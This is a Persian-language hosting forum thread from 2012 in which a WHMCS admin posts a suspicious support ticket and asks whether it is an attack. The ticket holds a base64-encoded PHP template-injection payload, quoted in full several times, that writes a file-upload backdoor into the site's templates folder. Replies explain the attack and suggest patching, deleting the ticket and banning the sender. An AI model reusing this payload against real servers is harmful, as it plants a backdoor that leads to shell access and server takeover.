-
July 12th, 2012, 13:50
#1
یکی از تیکت های ارسال شده برای من!
سلام
امروز با تیکتی مواجه شدم که محتویاتش این بود!
#939233 - {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
احتمال داره قصد ایجاد کدهای مخرب و هک کردن رو داشته باشن؟!
-
-
July 12th, 2012 13:50
# ADS
-
July 12th, 2012, 14:09
#2
عضو انجمن
پاسخ : یکی از تیکت های ارسال شده برای من!

نوشته اصلی توسط
navidahwaz
سلام
امروز با تیکتی مواجه شدم که محتویاتش این بود!
#939233 - {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
احتمال داره قصد ایجاد کدهای مخرب و هک کردن رو داشته باشن؟!
100%
-
-
July 12th, 2012, 14:24
#3
پاسخ : یکی از تیکت های ارسال شده برای من!
باید چکار کنم؟!
در سایت من بدون عضویت هم میشه تیکت زد و به این صورت تیکت زدن!
چکار کنم که فقط عضو ها بتونن تیکت بزنن؟
ویرایش توسط navidahwaz : July 12th, 2012 در ساعت 15:55
-
-
July 12th, 2012, 14:36
#4
پاسخ : یکی از تیکت های ارسال شده برای من!
با این کد یک اپلودر روی هاست شما ایجاد میشه و از طریق اون شل اپلود میشه و ادامه کار
پچ این باگ در همین انجمن موجوده
-
-
July 12th, 2012, 15:25
#5
پاسخ : یکی از تیکت های ارسال شده برای من!
سلام.
اطمینان حاصل کنید که به آخرین ورژن از WHMCS ارتقا دادید و در غیر این صورت خطر Exploit شدن سیستم شما را تحدید می کند.
پیشنهاد می شود به هیچ عنوان از ورژن Null شده استفاده نکنید که به طور 100% هک خواهید شد و اگر در اینترنت جستجو کنید این مورد به وفور مشاهده شده است.
با تشکر.
-
-
July 12th, 2012, 15:31
#6
عضو انجمن
پاسخ : یکی از تیکت های ارسال شده برای من!

نوشته اصلی توسط
navidahwaz
سلام
امروز با تیکتی مواجه شدم که محتویاتش این بود!
#939233 - {php}eval(base64_decode('jgnvzgugpsbiyxnlnjrfzgvjb 2rlkcjqrdl3yuhbtkntvmphrzhnsnp4bwizsnrjr0zqzedsdmj qmgljauj0wlhsb2iyutljbkj2yznraulhvnvzm1i1y0dvoultm tfisfjwy0dgewrdow1im0p0tfdsagrhrwljrzvoyldvouluvnd irzlowkdweulpqnbardbpzfhcc2iyrmtawelpugljn0rrcgxzm mh2sunjogfxnxdkwffnzehsd1pumglabwxzwlnjz2jtrnravdb pwm1sc1ptswdjmmw2wlqwau5uqwlqanhwym5cmwrdqnvzvzfsu fnkzmryqnnjauiwzvhcbfbtsnpkv0p0yvhraulhbgtqu0pmzfh cc0lpqjjzv3gxwlqwavzyqnnimkzrswo0oewywnzjbtarsnpzt kntbg1lq0frwdfcufuxumjkmtkxy0d3blhtqtlqu0fpvlhcc2i yrmtjaufwsuhztknnbhbaawhbwti5d2vtz2tymfpkvevwvfd5z g1hv3hssjexykozunrjrjl1wvcxbeoxmhnjq1jmumtstvjwtmj kmlpwykdvblhwc25ibuz0wlnkzetta2dleujswtjodkldyzhza jvwy0d4dllxuwdvmvzmvtbwveldrwhjvhd2wwo0oflusstqr0p 5ugljn0lime5dz2xsykhobelic2dav05vynlbblbhsstwwejzy jjga0lfzejsmeznsunfaelud3zzajq4ww5jk1bhsnlqawm3sug wtknume5dajgriik7dqokzm8gpsbmb3blbigidgvtcgxhdgvzl 2p4ac5wahailcj3iik7dqpmd3jpdguojgzvlcrjb2rlktt=')) ;{/php})
احتمال داره قصد ایجاد کدهای مخرب و هک کردن رو داشته باشن؟!
فقط حواستون باشه که از داخل whmcs این جور تیکت رو باز نکنید! اگر براتون ایمیل هم میشه، مستقیم از بخش تیکت، این تیکت رو قبل از باز کردن پاک کنید.
-
-
July 12th, 2012, 15:44
#7
عضو انجمن
پاسخ : یکی از تیکت های ارسال شده برای من!
1. تیکت رو پاک کنید
2. آی پی ارسال کننده ی تیکت رو در whmcs بن کنید
شرکت پیوند پردازش پارس با ۱۵ سال سابقه-دارای نماد اعتماد-شماره ثبت: 306111
آدرس سایت :
www.arnaweb.com
تماس با ما: 22694208,09123027875 __ Telegram: @beladi
-
-
July 12th, 2012, 15:53
#8
پاسخ : یکی از تیکت های ارسال شده برای من!

نوشته اصلی توسط
AvestaNetworks
سلام.
اطمینان حاصل کنید که به آخرین ورژن از WHMCS ارتقا دادید و در غیر این صورت خطر Exploit شدن سیستم شما را تحدید می کند.
پیشنهاد می شود به هیچ عنوان از ورژن Null شده استفاده نکنید که به طور 100% هک خواهید شد و اگر در اینترنت جستجو کنید این مورد به وفور مشاهده شده است.
با تشکر.
لایسنس دارم
آخرین ورژن رو نصب کردم
تیکتش رو هم باز کردم!
از چه راهی میشه تشخیص داد توی هاست ما شل هست یا نه؟!
-
-
July 12th, 2012, 15:55
#9
پاسخ : یکی از تیکت های ارسال شده برای من!
بگید که چطور میشه فقط کسانی که توی سایت عضو هستن بتونن تیکت بزنن؟
-
-
July 12th, 2012, 15:56
#10
عضو انجمن
پاسخ : یکی از تیکت های ارسال شده برای من!
اگر ورژنتون 5.0.3 بوده، پچ مورد نظر قبلاً روی این ورژن اعمال شده
-